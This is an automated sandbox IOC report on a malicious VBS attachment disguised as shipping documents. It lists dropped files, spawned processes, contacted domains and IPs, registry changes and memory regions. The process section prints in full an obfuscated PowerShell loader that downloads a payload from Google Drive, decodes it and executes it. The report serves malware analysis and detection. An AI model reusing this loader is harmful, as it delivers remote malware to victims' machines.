IOC Report
Shipping Dcuments_CI PKL_HL_.vbs

loading gif

Files

File Path
Type
Category
Malicious
Shipping Dcuments_CI PKL_HL_.vbs
ASCII text, with CRLF line terminators
initial sample
malicious
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
Microsoft Cabinet archive data, Windows 2000/XP setup, 69993 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
dropped
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
data
modified
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
data
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0klmoaqc.utu.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4cgebnra.4ym.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fvtx2fta.uy0.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_s04nqjjo.z0k.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Roaming\Electronegative.Sha
ASCII text, with very long lines (65536), with no line terminators
dropped

Processes

Path
Cmdline
Malicious
C:\Windows\System32\wscript.exe
C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Shipping Dcuments_CI PKL_HL_.vbs"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Semiannually163 = 1;$Varityped='Substrin';$Varityped+='g';Function Spatiumet($Merotomy){$Ganglioma=$Merotomy.Length-$Semiannually163;For($Undereying136=5; $Undereying136 -lt $Ganglioma; $Undereying136+=(6)){$Stacc+=$Merotomy.$Varityped.Invoke($Undereying136, $Semiannually163);}$Stacc;}function Salsdren($Fortynd){. ($Fusionsaftaler) ($Fortynd);}$Morallovene=Spatiumet 'FindeM SlaboBed,mzGuiltiSu.nolUnforlVarmeaSkru /Afslr5 p yn.U aft0 Kost Al,og(DdsaaW,pitaiboo lnBrssedNusseoSem cwFremssDi eg ChattNPrethT,oren Supra1Abe.s0Guldv.Colou0Haema;Adria Br,dsWr creiFormanRefrn6Uncou4velar; Legi noncix non 6 Nikl4Synli; skri PseurGasm,vP,gts:Bj.rg1 Mo,i2Organ1Armad.Flask0Abs,i)Galo. r tscGSkyldeAktioc DionkNoncooSyske/,atin2Luged0Janse1Bul.p0fj.rn0E cin1Pante0Coope1Surro ,aineFFly eiUvi lr,readeRve,efDiphyoAphroxHarri/Bygn.1Eluls2Ebelt1Tra i.Perca0 Dupe ';$Anathematise=Spatiumet 'Lill,UFalhos SpleeP lorrFiske-OhsknAN.ighg Pawne MasknLechrtOnion ';$Aivr=Spatiumet 'FigurhpreintGer.rtVognppT.llas.onse:Lay u/Bi,le/ B.lldFinerrF.agti Bj,gvindpae.atte. .ilpgCanchoEuropo Educgwr telAfslaered.m.Bak ucK upvoPengem Vlve/AfstvupervecFrit ? k,noeLivewxminerp BelooTiltrrwind tU lia=BallodSankeoOp ftwKrvernDekodlKapreo OxydaHum.ld appl& ScariGeomedAmnio= Hudd1 DommOL.omeS ErroQGal,iaUdbetZKartolChanikRatapr Tink_ Clar7 Kna.hF.uevzspadspRovdy0DeminlAtomaSPh.liF PagiBProgr9 AergdTappejUdb t3FanmagFagblxDagplcN,ninEOutf.oUna.etCentr-Sikke9Figensbrain5Tyven ';$Succesombrust=Spatiumet 'Trykl>Polyh ';$Fusionsaftaler=Spatiumet 'af eniTankeeWattsxAl um ';$Pantebrevshandelen = Spatiumet ' ntee JerncWkdrehA johoL,xia D.ske%SvindaRa,tapDevonpButi,dCi,araOveretPennaaDef,n%Pragt\Flec.EFu,dvlsubapeProvicSortetIndicr TheooEb.lln TroueSup lg Panda .ogltReinsiDriftv Hypee Beci. At eS U.dihUng oaPer,i Patte&union& s.bl Hamm eOsterc KonghUn.pao Urba Lsnin$Pum.c ';Salsdren (Spatiumet 'Suppl$Enh.lgbolivlsemino uni,bBoligaSvulmlindsp: Plo,fTransl Tje,uRinglkGroovtRa eru JungeCatenr HovniGreennUndefgoutre=Himme(Tiltac EpokmXsford Ra.i Prova/datasc Deut Dext.$ mesiPJagteaBoligngelogt SkileBehanbEupherEnra.eL gtevCrustsisba.h DewaaHalopnChrisdSkakte RaillUdadreDec,lnPaatv)Antil ');Salsdren (Spatiumet ' Mist$ Ma,sgTilprl banko dashb.annyaKardslQuant:GeledACemennMaalet Bet.h,iltvr .ndkoAbamppA taco Pa lpPass hPa ahaTr,llgUbereiAgerbsGrns tforsii .airc E,ip=garvn$FratrASeraliArapavFenacrOttea.JournsmorbrpIntarlMandaiCou ttSuper(Skri $St noSAmp,iu NytacContrcRygraePunktsRecomo NavnmKhedabExsicrDametuRustbsUnddrtBesgs)T les ');$Aivr=$Anthropophagistic[0];Salsdren (Spatiumet 'Ov rm$CiphegOpskrlPromeoF rskbScollaAntiplF.ske:b skuFDrvleoafbrer Ulkss .rageFl esnAusredLigniedishblInsissTel.fe UndesDagceoSnapsmTilvekYdelsoShattsb odstAutoenMicreiGalannmindeg SladedopinrFyrin= itriNFa,ceeCellewPhono- SknlOHoussbplotnj Deple HydrcUn.stt Refr KonkuSBucrny.ecoms AffttNo gleSens mSa kt.BelieNOffsheRdseltBe or. Sco.WPoiaae IchtbGi maCKarikl.oostiOpildemedt,nBa.stt Flyd ');Salsdren (Spatiumet ',leek$BerigFPol to,efairPu pessymboeRussinmidd dCeltieDiamalUbesksForgie ites Beseo SkanmForlakBem.loDobbesGadertTouchnsterniShirtnUnoffgSeksae rbejrPalme.Ers aHBelyseManeuaOmniadSupereHewabrTelefsMot,t[ maxi$Kv ntA padrnTen.raBranctToresh,rgameLandlmSekreamyrmit AftriSa,dss T.awe pr.s]N.rin=P,lit$Es.reMNeglpoU derrLivegaja oulEuryglSuitioTiltrvanorge S.rvnDrvtye sh,p ');$Samosa=Spatiumet 'ConfiFSatsao emarrUnpolsPreseesacchn.ichwd Unsue Rgfol vicisMudroeUdenrsunderoFe,mimWe,dik SkruoRejecsBisamtLeeronfeignirustknDonkrgPettie P.anr ,ort.KlammD Ta,ooSal swGrms.nVirkelTurboo Synda A.lgdRikocFAstroi Calal,aneveBroch(Aquo.$.achiAMisgriK.yedvRejserUnpul,Lippi$ F blJ Te eaRetsbkUnsenkP,aine eknonGehe,)Drmme ';$Samosa=$fluktuering[1]+$Samosa;$Jakken=$fluktuering[0];Salsdren (Spatiumet 'Disso$ au.ogAkkrel Estlo .ippbNytteaStupelPmkha:UndefPBotuleRiposrFljtecSove,aSpeci= Tele(M.sicTModule,etersGenh.t Nedb-St,afP Pul,aVitaltBi.lehNitsk Line$BecooJ Orfealasttk.orlfkCost,eslughnSrege)Spalt ');while (!$Perca) {Salsdren (Spatiumet ' Udko$Al.ingStjfolSmickoValutbUnmonaRealelProf.:Rel.tIDrejedSnowseLagenn Se,ttDohiciAbsu.t,avebeGniddtSupers ommemPaatar.aagekIncaveH ldnsAgoni=mult.$LatertBagt.r M.saum.ljreObeys ') ;Salsdren $Samosa;Salsdren (Spatiumet ' CareSS.aldtTinneaAristrI dvatKomme-Oste.SAlbu.lTrumfeGuldse AfkapGoitc Boks4 oms ');Salsdren (Spatiumet 'Inds $GnavegPreexl MonsoKinetbjasesaRevislVario:drommP UndeeTher rBrewic Sm aarepos= O,er(ReinfTMetase MisfsMinvetRote,- IrriPIntelaArve.tSublah Supe Pyrhe$EnemrJ Badma AmtskVliesk Solne ,auhn Ci,c) Car ') ;Salsdren (Spatiumet ' Hrsi$KendegYn lilDyretoli,jebKantoa Han,lSkand:HighlLUnderuPathomResneb.utotuPaakrsH,eft=P.ior$Latiag RegnlUndero Ske,b Ma.daTrykkl ani:Ri gkBHemipeRepr,gSu.errWrencaCan.ivse ebe P,rglChecksStarteSkyhjsStrenkForesaReflep MurreDri ll ProplOrycteBrnefrLejeishande+O.tiu+,luxa%Zilli$TaxafAF rstn BalktAdganhsarder IronoDefacpFlugtoshillpVizorh Kabea LonggLuftii P,risAg.sttReshiiAutorcKrakk.Bra.lcTra ioRkemou nternInvestCodeb ') ;$Aivr=$Anthropophagistic[$Lumbus];}Salsdren (Spatiumet ' ,lan$FortsgInforlSelvio SkinbRanseaRohrnlAnekd: eminNcatasuPirozmNabobmscutceRerair Frnup MaullPaaskaTakstdEnunceA rornDoktosEleme Tast=eskad cadeG Copre AarmtS ffl-DitetCTestdos,linnstafft.aunueKalkbnVarmet Cond Pron,$SymboJP,nctaB,plak undekSquigeYarurnUbaad ');Salsdren (Spatiumet 'Tryne$A vecgLay rlNikoloI filb fkapaKontol Gkke:FerieSUnmigpMetreaAparttDelegtPalaelFlinkeVestidMaci. Mumme=Handy Pythi[ DileSReattyRevissred vtKollieU eldmMi op.PolteCSiennoCh,omnVauntv AngreMindsrMesost.llit]Apter:Somme: oragFAvicur k.sto NdspmOver B.viseaAnda.sH,droekonve6R,gne4 SnotS CasttInflurNonsei ConvnBussegScoli( sple$Omn,pN.uelouJournm FootmVita,eUdklarRespopRegislUdsaeaSuppldAm.anet,enenBekissVesic)Strej ');Salsdren (Spatiumet 'Annso$Be.aigMad.il Suggo,rimeb Fugta Kon,lU.pan:MarinSMiljtp rilsaBendlcMasseiBlankoGyropuphospsDberelMimicy Alp. Sdemn= stje Retti[ PneuSDebriyKnyt.s .aantE.seme kampmOtari.PredeT Stv,eLejekxCentrt Pupi.GramiE Un nnFibricFagfoo.ehondOpspuiFastenLithogIndi,]Basi,:herov: M.thAJobbeSEyewaC AfifIIndisIHand,.AlgotGSkraleAraertTerriSPapritToskirI dbriLazarnvrkstgattro(Bedst$Ho,edS,enzppS,angaElgabtRunddt AktilB.gheeGlaned nder)Telec ');Salsdren (Spatiumet 'Nuanc$SicilgBladelTil,roi stabMuta,aCandllPorr,:MenneESpejlpTilreiCassosSkrespIndfra Ly.psAnal tScrabiD,miccM,lie=Tarif$ RdhaSPandepHalslaC.stoc TragiAfmaroSeconu Av ssRe oglUnderyPedes.Un,onsTilleuMati b.ejltsFri et GosprP,ryni Qu cnRes,rgadopt(Polys2 ilis9Brudf2Ka,in8Rteb.4Mobil6dtr n,,rusi2Mulig8Under3Smel,5Tel,g8Faneb) nmed ');Salsdren $Epispastic;"
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Semiannually163 = 1;$Varityped='Substrin';$Varityped+='g';Function Spatiumet($Merotomy){$Ganglioma=$Merotomy.Length-$Semiannually163;For($Undereying136=5; $Undereying136 -lt $Ganglioma; $Undereying136+=(6)){$Stacc+=$Merotomy.$Varityped.Invoke($Undereying136, $Semiannually163);}$Stacc;}function Salsdren($Fortynd){. ($Fusionsaftaler) ($Fortynd);}$Morallovene=Spatiumet 'FindeM SlaboBed,mzGuiltiSu.nolUnforlVarmeaSkru /Afslr5 p yn.U aft0 Kost Al,og(DdsaaW,pitaiboo lnBrssedNusseoSem cwFremssDi eg ChattNPrethT,oren Supra1Abe.s0Guldv.Colou0Haema;Adria Br,dsWr creiFormanRefrn6Uncou4velar; Legi noncix non 6 Nikl4Synli; skri PseurGasm,vP,gts:Bj.rg1 Mo,i2Organ1Armad.Flask0Abs,i)Galo. r tscGSkyldeAktioc DionkNoncooSyske/,atin2Luged0Janse1Bul.p0fj.rn0E cin1Pante0Coope1Surro ,aineFFly eiUvi lr,readeRve,efDiphyoAphroxHarri/Bygn.1Eluls2Ebelt1Tra i.Perca0 Dupe ';$Anathematise=Spatiumet 'Lill,UFalhos SpleeP lorrFiske-OhsknAN.ighg Pawne MasknLechrtOnion ';$Aivr=Spatiumet 'FigurhpreintGer.rtVognppT.llas.onse:Lay u/Bi,le/ B.lldFinerrF.agti Bj,gvindpae.atte. .ilpgCanchoEuropo Educgwr telAfslaered.m.Bak ucK upvoPengem Vlve/AfstvupervecFrit ? k,noeLivewxminerp BelooTiltrrwind tU lia=BallodSankeoOp ftwKrvernDekodlKapreo OxydaHum.ld appl& ScariGeomedAmnio= Hudd1 DommOL.omeS ErroQGal,iaUdbetZKartolChanikRatapr Tink_ Clar7 Kna.hF.uevzspadspRovdy0DeminlAtomaSPh.liF PagiBProgr9 AergdTappejUdb t3FanmagFagblxDagplcN,ninEOutf.oUna.etCentr-Sikke9Figensbrain5Tyven ';$Succesombrust=Spatiumet 'Trykl>Polyh ';$Fusionsaftaler=Spatiumet 'af eniTankeeWattsxAl um ';$Pantebrevshandelen = Spatiumet ' ntee JerncWkdrehA johoL,xia D.ske%SvindaRa,tapDevonpButi,dCi,araOveretPennaaDef,n%Pragt\Flec.EFu,dvlsubapeProvicSortetIndicr TheooEb.lln TroueSup lg Panda .ogltReinsiDriftv Hypee Beci. At eS U.dihUng oaPer,i Patte&union& s.bl Hamm eOsterc KonghUn.pao Urba Lsnin$Pum.c ';Salsdren (Spatiumet 'Suppl$Enh.lgbolivlsemino uni,bBoligaSvulmlindsp: Plo,fTransl Tje,uRinglkGroovtRa eru JungeCatenr HovniGreennUndefgoutre=Himme(Tiltac EpokmXsford Ra.i Prova/datasc Deut Dext.$ mesiPJagteaBoligngelogt SkileBehanbEupherEnra.eL gtevCrustsisba.h DewaaHalopnChrisdSkakte RaillUdadreDec,lnPaatv)Antil ');Salsdren (Spatiumet ' Mist$ Ma,sgTilprl banko dashb.annyaKardslQuant:GeledACemennMaalet Bet.h,iltvr .ndkoAbamppA taco Pa lpPass hPa ahaTr,llgUbereiAgerbsGrns tforsii .airc E,ip=garvn$FratrASeraliArapavFenacrOttea.JournsmorbrpIntarlMandaiCou ttSuper(Skri $St noSAmp,iu NytacContrcRygraePunktsRecomo NavnmKhedabExsicrDametuRustbsUnddrtBesgs)T les ');$Aivr=$Anthropophagistic[0];Salsdren (Spatiumet 'Ov rm$CiphegOpskrlPromeoF rskbScollaAntiplF.ske:b skuFDrvleoafbrer Ulkss .rageFl esnAusredLigniedishblInsissTel.fe UndesDagceoSnapsmTilvekYdelsoShattsb odstAutoenMicreiGalannmindeg SladedopinrFyrin= itriNFa,ceeCellewPhono- SknlOHoussbplotnj Deple HydrcUn.stt Refr KonkuSBucrny.ecoms AffttNo gleSens mSa kt.BelieNOffsheRdseltBe or. Sco.WPoiaae IchtbGi maCKarikl.oostiOpildemedt,nBa.stt Flyd ');Salsdren (Spatiumet ',leek$BerigFPol to,efairPu pessymboeRussinmidd dCeltieDiamalUbesksForgie ites Beseo SkanmForlakBem.loDobbesGadertTouchnsterniShirtnUnoffgSeksae rbejrPalme.Ers aHBelyseManeuaOmniadSupereHewabrTelefsMot,t[ maxi$Kv ntA padrnTen.raBranctToresh,rgameLandlmSekreamyrmit AftriSa,dss T.awe pr.s]N.rin=P,lit$Es.reMNeglpoU derrLivegaja oulEuryglSuitioTiltrvanorge S.rvnDrvtye sh,p ');$Samosa=Spatiumet 'ConfiFSatsao emarrUnpolsPreseesacchn.ichwd Unsue Rgfol vicisMudroeUdenrsunderoFe,mimWe,dik SkruoRejecsBisamtLeeronfeignirustknDonkrgPettie P.anr ,ort.KlammD Ta,ooSal swGrms.nVirkelTurboo Synda A.lgdRikocFAstroi Calal,aneveBroch(Aquo.$.achiAMisgriK.yedvRejserUnpul,Lippi$ F blJ Te eaRetsbkUnsenkP,aine eknonGehe,)Drmme ';$Samosa=$fluktuering[1]+$Samosa;$Jakken=$fluktuering[0];Salsdren (Spatiumet 'Disso$ au.ogAkkrel Estlo .ippbNytteaStupelPmkha:UndefPBotuleRiposrFljtecSove,aSpeci= Tele(M.sicTModule,etersGenh.t Nedb-St,afP Pul,aVitaltBi.lehNitsk Line$BecooJ Orfealasttk.orlfkCost,eslughnSrege)Spalt ');while (!$Perca) {Salsdren (Spatiumet ' Udko$Al.ingStjfolSmickoValutbUnmonaRealelProf.:Rel.tIDrejedSnowseLagenn Se,ttDohiciAbsu.t,avebeGniddtSupers ommemPaatar.aagekIncaveH ldnsAgoni=mult.$LatertBagt.r M.saum.ljreObeys ') ;Salsdren $Samosa;Salsdren (Spatiumet ' CareSS.aldtTinneaAristrI dvatKomme-Oste.SAlbu.lTrumfeGuldse AfkapGoitc Boks4 oms ');Salsdren (Spatiumet 'Inds $GnavegPreexl MonsoKinetbjasesaRevislVario:drommP UndeeTher rBrewic Sm aarepos= O,er(ReinfTMetase MisfsMinvetRote,- IrriPIntelaArve.tSublah Supe Pyrhe$EnemrJ Badma AmtskVliesk Solne ,auhn Ci,c) Car ') ;Salsdren (Spatiumet ' Hrsi$KendegYn lilDyretoli,jebKantoa Han,lSkand:HighlLUnderuPathomResneb.utotuPaakrsH,eft=P.ior$Latiag RegnlUndero Ske,b Ma.daTrykkl ani:Ri gkBHemipeRepr,gSu.errWrencaCan.ivse ebe P,rglChecksStarteSkyhjsStrenkForesaReflep MurreDri ll ProplOrycteBrnefrLejeishande+O.tiu+,luxa%Zilli$TaxafAF rstn BalktAdganhsarder IronoDefacpFlugtoshillpVizorh Kabea LonggLuftii P,risAg.sttReshiiAutorcKrakk.Bra.lcTra ioRkemou nternInvestCodeb ') ;$Aivr=$Anthropophagistic[$Lumbus];}Salsdren (Spatiumet ' ,lan$FortsgInforlSelvio SkinbRanseaRohrnlAnekd: eminNcatasuPirozmNabobmscutceRerair Frnup MaullPaaskaTakstdEnunceA rornDoktosEleme Tast=eskad cadeG Copre AarmtS ffl-DitetCTestdos,linnstafft.aunueKalkbnVarmet Cond Pron,$SymboJP,nctaB,plak undekSquigeYarurnUbaad ');Salsdren (Spatiumet 'Tryne$A vecgLay rlNikoloI filb fkapaKontol Gkke:FerieSUnmigpMetreaAparttDelegtPalaelFlinkeVestidMaci. Mumme=Handy Pythi[ DileSReattyRevissred vtKollieU eldmMi op.PolteCSiennoCh,omnVauntv AngreMindsrMesost.llit]Apter:Somme: oragFAvicur k.sto NdspmOver B.viseaAnda.sH,droekonve6R,gne4 SnotS CasttInflurNonsei ConvnBussegScoli( sple$Omn,pN.uelouJournm FootmVita,eUdklarRespopRegislUdsaeaSuppldAm.anet,enenBekissVesic)Strej ');Salsdren (Spatiumet 'Annso$Be.aigMad.il Suggo,rimeb Fugta Kon,lU.pan:MarinSMiljtp rilsaBendlcMasseiBlankoGyropuphospsDberelMimicy Alp. Sdemn= stje Retti[ PneuSDebriyKnyt.s .aantE.seme kampmOtari.PredeT Stv,eLejekxCentrt Pupi.GramiE Un nnFibricFagfoo.ehondOpspuiFastenLithogIndi,]Basi,:herov: M.thAJobbeSEyewaC AfifIIndisIHand,.AlgotGSkraleAraertTerriSPapritToskirI dbriLazarnvrkstgattro(Bedst$Ho,edS,enzppS,angaElgabtRunddt AktilB.gheeGlaned nder)Telec ');Salsdren (Spatiumet 'Nuanc$SicilgBladelTil,roi stabMuta,aCandllPorr,:MenneESpejlpTilreiCassosSkrespIndfra Ly.psAnal tScrabiD,miccM,lie=Tarif$ RdhaSPandepHalslaC.stoc TragiAfmaroSeconu Av ssRe oglUnderyPedes.Un,onsTilleuMati b.ejltsFri et GosprP,ryni Qu cnRes,rgadopt(Polys2 ilis9Brudf2Ka,in8Rteb.4Mobil6dtr n,,rusi2Mulig8Under3Smel,5Tel,g8Faneb) nmed ');Salsdren $Epispastic;"
malicious
C:\Program Files (x86)\Windows Mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe"
malicious
C:\Windows\System32\wbem\WmiPrvSE.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Electronegative.Sha && echo $"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Electronegative.Sha && echo $"

URLs

Name
IP
Malicious
http://pesterbdd.com/images/Pester.png
unknown
malicious
https://api.ipify.org/
172.67.74.152
https://www.google.com
unknown
http://nuget.org/NuGet.exe
unknown
http://drive.usercontent.google.com
unknown
https://aka.ms/pscore6lB
unknown
http://www.apache.org/licenses/LICENSE-2.0.html
unknown
https://go.micro
unknown
https://drive.googPz
unknown
https://contoso.com/
unknown
https://nuget.org/nuget.exe
unknown
https://contoso.com/License
unknown
https://contoso.com/Icon
unknown
https://drive.google.com
unknown
https://drive.usercontent.googh
unknown
https://drive.usercontent.google.com
unknown
http://drive.google.com
unknown
https://aka.ms/pscore68
unknown
https://apis.google.com
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
https://github.com/Pester/Pester
unknown
http://ip-api.com/line/?fields=hosting
208.95.112.1
There are 12 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
mail.myhydropowered.com
unknown
malicious
bg.microsoft.map.fastly.net
199.232.214.172
drive.google.com
64.233.185.102
drive.usercontent.google.com
64.233.185.132
api.ipify.org
172.67.74.152
ip-api.com
208.95.112.1

IPs

IP
Domain
Country
Malicious
64.233.185.102
drive.google.com
United States
208.95.112.1
ip-api.com
United States
64.233.185.132
drive.usercontent.google.com
United States
172.67.74.152
api.ipify.org
United States

Registry

Path
Value
Malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASAPI32
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASMANCS
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASMANCS
FileDirectory
There are 19 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
5C45000
trusted library allocation
page read and write
malicious
8580000
direct allocation
page execute and read and write
malicious
250CBDD2000
trusted library allocation
page read and write
malicious
22FEB000
trusted library allocation
page read and write
malicious
A2B0000
direct allocation
page execute and read and write
malicious
5800000
remote allocation
page execute and read and write
malicious
22FC5000
trusted library allocation
page read and write
malicious
24CD105B000
heap
page read and write
75C0000
heap
page readonly
7347000
heap
page read and write
7FFB4B350000
trusted library allocation
page read and write
7347000
heap
page read and write
7347000
heap
page read and write
7460000
trusted library allocation
page read and write
7347000
heap
page read and write
2D40000
heap
page read and write
7347000
heap
page read and write
22F12000
trusted library allocation
page read and write
7FFB4B330000
trusted library allocation
page read and write
7347000
heap
page read and write
2BA9000
heap
page read and write
82A8000
heap
page read and write
4B13000
trusted library allocation
page read and write
7347000
heap
page read and write
7347000
heap
page read and write
250BDB33000
trusted library allocation
page read and write
24CD10BD000
heap
page read and write
25690000
trusted library allocation
page read and write
7347000
heap
page read and write
2E10000
trusted library allocation
page read and write
2F80000
heap
page read and write
8230000
heap
page read and write
25680000
trusted library allocation
page read and write
7347000
heap
page read and write
24CD10DD000
heap
page read and write
7347000
heap
page read and write
24CD1079000
heap
page read and write
24CCF185000
heap
page read and write
7347000
heap
page read and write
85B0000
direct allocation
page read and write
4E00000
remote allocation
page execute and read and write
250F4000
heap
page read and write
7F5B0000
trusted library allocation
page execute and read and write
7347000
heap
page read and write
24CD1789000
heap
page read and write
7640000
direct allocation
page read and write
22CE0000
heap
page read and write
48B0000
direct allocation
page read and write
7347000
heap
page read and write
22A0D000
stack
page read and write
4A0A000
stack
page read and write
7347000
heap
page read and write
7347000
heap
page read and write
250BDB68000
trusted library allocation
page read and write
7347000
heap
page read and write
250BBDE5000
trusted library allocation
page read and write
2B60000
trusted library allocation
page read and write
7347000
heap
page read and write
7347000
heap
page read and write
250D4466000
heap
page read and write
250D4482000
heap
page read and write
7EF0000
trusted library allocation
page execute and read and write
7347000
heap
page read and write
250BA17F000
heap
page read and write
7347000
heap
page read and write
25CA0000
trusted library allocation
page read and write
22C90000
direct allocation
page read and write
250D41AC000
heap
page read and write
7347000
heap
page read and write
250CBD6F000
trusted library allocation
page read and write
24CCF256000
heap
page read and write
24CD1789000
heap
page read and write
7347000
heap
page read and write
701E000
stack
page read and write
24CD103C000
heap
page read and write
22F50000
heap
page execute and read and write
7347000
heap
page read and write
7347000
heap
page read and write
22BC0000
heap
page read and write
24CD0FAB000
heap
page read and write
2EA0000
heap
page read and write
2B70000
trusted library allocation
page read and write
7276000
heap
page read and write
7347000
heap
page read and write
7347000
heap
page read and write
2CFE000
stack
page read and write
742E000
heap
page read and write
7347000
heap
page read and write
24CD0FEE000
heap
page read and write
7347000
heap
page read and write
25691000
trusted library allocation
page read and write
24CD1750000
heap
page read and write
25CB0000
trusted library allocation
page read and write
7347000
heap
page read and write
7347000
heap
page read and write
7FFB4B130000
trusted library allocation
page read and write
7347000
heap
page read and write
7347000
heap
page read and write
7347000
heap
page read and write
4C08000
trusted library allocation
page read and write
F9948F8000
stack
page read and write
7347000
heap
page read and write
5AD9000
trusted library allocation
page read and write
7347000
heap
page read and write
24FE0000
heap
page execute and read and write
7347000
heap
page read and write
7347000
heap
page read and write
7347000
heap
page read and write
7347000
heap
page read and write
7347000
heap
page read and write
71B6000
heap
page read and write
24CD10FF000
heap
page read and write
7347000
heap
page read and write
7347000
heap
page read and write
7347000
heap
page read and write
25690000
trusted library allocation
page read and write
49CE000
stack
page read and write
7347000
heap
page read and write
7347000
heap
page read and write
24CD1239000
heap
page read and write
7347000
heap
page read and write
7347000
heap
page read and write
7423000
heap
page read and write
74B0000
trusted library allocation
page read and write
5B1A000
trusted library allocation
page read and write
24CD0F1E000
heap
page read and write
7347000
heap
page read and write
48D0000
direct allocation
page read and write
24CD1769000
heap
page read and write
25CA0000
trusted library allocation
page read and write
7347000
heap
page read and write
25680000
trusted library allocation
page read and write
F994CFB000
stack
page read and write
25670000
trusted library allocation
page read and write
7347000
heap
page read and write
7347000
heap
page read and write
24CD0FA8000
heap
page read and write
7347000
heap
page read and write
7347000
heap
page read and write
24CD0F93000
heap
page read and write
7347000
heap
page read and write
250D4286000
heap
page read and write
7FFB4B320000
trusted library allocation
page read and write
5C3F000
trusted library allocation
page read and write
8550000
trusted library allocation
page read and write
250BA0FD000
heap
page read and write
25690000
trusted library allocation
page read and write
7347000
heap
page read and write
25670000
trusted library allocation
page read and write
7347000
heap
page read and write
7FFB4B410000
trusted library allocation
page read and write
7347000
heap
page read and write
7347000
heap
page read and write
7347000
heap
page read and write
C12D4FF000
unkown
page read and write
75D0000
direct allocation
page read and write
7FFB4B400000
trusted library allocation
page read and write
24CD10E1000
heap
page read and write
84C0000
trusted library allocation
page read and write
7347000
heap
page read and write
7347000
heap
page read and write
